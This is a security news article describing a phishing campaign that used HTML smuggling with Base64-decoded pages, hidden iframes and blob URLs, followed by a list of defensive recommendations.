Phishing attackers used an HTML smuggling technique to deliver malware. The attack began with a phishing email that looked like an American Express notification, leading to several redirects.
The last redirect went to a public Cloudflare R2 bucket hosting an HTML file. This file loaded external JavaScript code with a Base64-encoded string that, when decoded, revealed the actual phishing page. This shows how HTML smuggling can hide malicious content effectively.
The JavaScript code waits for the page to load before decoding a Base64-encoded HTML string into plain text, likely a phishing page designed to trick users into revealing sensitive information.
The code creates a hidden iframe to load the decoded phishing content, hiding the malicious activity from the user.
The openFileURL
function creates a downloadable file from the decoded HTML content by making a blob object with the data and content type, then generates a URL for this blob.
Finally, it redirects the browser to this URL to display the content and revokes the blob URL after a short delay to prevent memory leaks.
Blob URLs are temporary web addresses for binary data stored in the browser. Cybercriminals use this feature to create malicious files locally, avoiding traditional security measures.
These files can deliver harmful payloads directly to users, making attacks harder to detect.
By generating files on the client side, attackers can embed them in normal web pages or exploit browser vulnerabilities, creating significant security risks.
The phishing pages use a sophisticated HTML smuggling technique to hide malicious code within seemingly legitimate HTML elements. They mimic trusted services like DocuSign and Microsoft to trick users into entering sensitive information.
Attackers exploit HTML’s flexibility to hide malicious code within its structure, making detection difficult for traditional security measures. This highlights the need for vigilant security practices and advanced threat detection to combat evolving phishing attacks.
HTML smuggling is a growing concern as it bypasses traditional security by hiding malicious content in seemingly harmless HTML files, often using obfuscation techniques like blob URLs.
Trustwave notes that as phishing attacks become more sophisticated, the use of HTML smuggling is expected to increase, making advanced security solutions essential for organizations.
Here are some recommendations to combat HTML smuggling and phishing attacks:
- Implement Advanced Threat Detection
- Use security solutions that can detect hidden malicious code and advanced obfuscation techniques.
- Enhance Email Security
- Deploy email filtering solutions to block phishing emails before they reach users.
- Conduct Security Awareness Training
- Educate employees on recognizing phishing attempts and the risks of HTML smuggling.
- Utilize Web Filtering Tools
- Use web filters to block access to known malicious sites and detect harmful content.
- Employ Multi-Factor Authentication (MFA)
- Require MFA for accessing sensitive systems to add an extra layer of security.
- Monitor Network Traffic
- Regularly monitor network activity for unusual behavior that may indicate an attack.
- Regularly Update Software
- Keep all software, including browsers and security tools, up to date to protect against vulnerabilities.
- Conduct Regular Security Audits
- Perform audits to identify and address potential weaknesses in security measures.
- Implement Content Security Policies (CSP)
- Use CSP to control which resources can be loaded on your web pages, reducing the risk of loading malicious content.
- Encourage Strong Password Practices
- Promote the use of strong, unique passwords and password managers to protect against unauthorized access.
Follow Us on: Twitter, Instagram, Facebook to get the latest security news!
Leave A Comment